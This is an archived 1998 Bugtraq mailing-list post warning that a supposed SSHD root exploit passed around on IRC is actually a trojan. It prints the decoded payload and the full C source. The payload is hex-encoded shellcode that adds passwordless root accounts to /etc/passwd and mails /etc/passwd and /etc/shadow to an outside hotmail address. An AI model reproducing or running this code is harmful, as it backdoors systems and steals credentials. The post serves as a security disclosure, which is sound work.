The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version

Search
Новость: Юзабилити открытого ПО
SOFT - Unix Software catalog
LINKS - Unix resources
TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

Administrivia


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Sun, 15 Nov 1998 02:31:58 -0600
From: Chris Tobkin <tobkin@JAWS.UMN.EDU>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Administrivia

Speaking of trojans/lame scripts, there is a 'root exploit for Linux 2.0.* and
possibly 2.1.* SSHD 1.5-1.2.23' going around on some of the efnet channels..
It is actually a spiffed up c script that does:

 echo b4b0::0:0::/:>>/etc/passwd;echo babo::10:10::/: >> /etc/passwd ; (cat /etc/passwd /etc/shadow ;/sbin/ifconfig)|mail kitandjp@hotmail.com
 /bin/sh

If one were to just print out the shellcode this would be immediately obvious.
(i.e. printf("<insert shellcode here>");  pipe it through strings to get rid of
the control characters..)

The filenames that it is been being passed around as are "sshdexp.c" and the
"sshdwarez.c" which was already referenced on bugtraq...  other people can rip
this one to shreds with the fetch() which is cute..  and the system("/bin/echo")
instead of printf("").  This is, however, a good way to get rid of scriptkiddies
that don't know how to write code but want all the benefits of everyone elses's
intelligence..

Caveat emptor, again.

// chris
tobkin@umn.edu

*************************************************************************
Chris Tobkin                                               tobkin@umn.edu
Java and Web Services - Academic and Distributed Computing Services - UMN
 -----------------------------------------------------------------------
  "Thanks to the printing press, the deviant smart people were able to
    distribute their genius without having to pass it on genetically.
         Evolution was short-circuited.  We gained knowlege and
        technology without gaining intelligence." - Scott Addams
*************************************************************************

-- sshdtrojan.c --

/************************************************************************/
/* root exploit for Linux 2.0.* and possible 2.1.* SSHD 1.5-1.2.23      */
/* On some weird systems this causes a segfault                         */
/* If it doesnt work change the offset (usually between 0 and 5000)     */
/*                                     (try increments of 2.......)     */
/* TO RUN:                                                              */
/* (./sshdwarez ; cat) | nc victim 22                                   */
/*                                                                      */
/*              forever yours: st4n@zdnetmail.com                       */
/************************************************************************/

#include <string.h>
#include <unistd.h>
#include <stdlib.h>

#define OFFSET  146
#define NOP     0x90

char shellcode[] =
"\xbc\x84\x04\x08\x65\x63\x68\x6f\x20\x62\x34\x62\x30\x3a\x3a\x30\x3a"
"\x30\x3a\x3a\x2f\x3a\x3e\x3e\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77"
"\x64\x3b\x65\x63\x68\x6f\x20\x62\x61\x62\x6f\x3a\x3a\x31\x30\x3a\x31"
"\x30\x3a\x3a\x2f\x3a\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73"
"\x73\x77\x64\x20\x3b\x20\x28\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77"
"\x20\x3b\x2f\x73\x62\x69\x6e\x2f\x69\x66\x63\x6f\x6e\x66\x69\x67\x29"
"\x7c\x6d\x61\x69\x6c\x20\x6b\x69\x74\x61\x6e\x64\x6a\x70\x40\x68\x6f"
"\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x00\xeb\x1f\x5e\x89\x76\x08\x31"
"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

int fetch(int *w){      /* push and return something from the stack */
        char stack[4096];
        int (*push)();
        memcpy((int*)&push,w,sizeof(int));
        memcpy(stack,(char*)w+4,OFFSET-5);
        push(stack);
        return *w;
}

int i;
char *p;
main(int argc,char**argv)
{
        char s[1024];
        char ssh[] = "\x8c\xfd\xff\xbf\x48\x9b"; /* starts ssh session */
        strcpy(argv[0],"vi          ");

        if (getuid())
        {
                system("/bin/echo this program uses priveledged ports. "
                       "run as root.");
                return -1;
        }
        write(1,ssh,sizeof(ssh));
        for (i=0;i<500;i++)
                s[i]=NOP;
        p=&s[i];
        memcpy(p,&shellcode[OFFSET],sizeof(shellcode)-OFFSET);
        /* most [linux] systems keep libc functions in the same place */
        i=(int)system;memcpy(&shellcode,&i,sizeof(int));
        write(1,s,500+(sizeof(shellcode)-OFFSET));
        fetch((int*)&shellcode);
        usleep(1000000);
        return 0;
}

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки
Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList
RB2 Network. RB2 Network.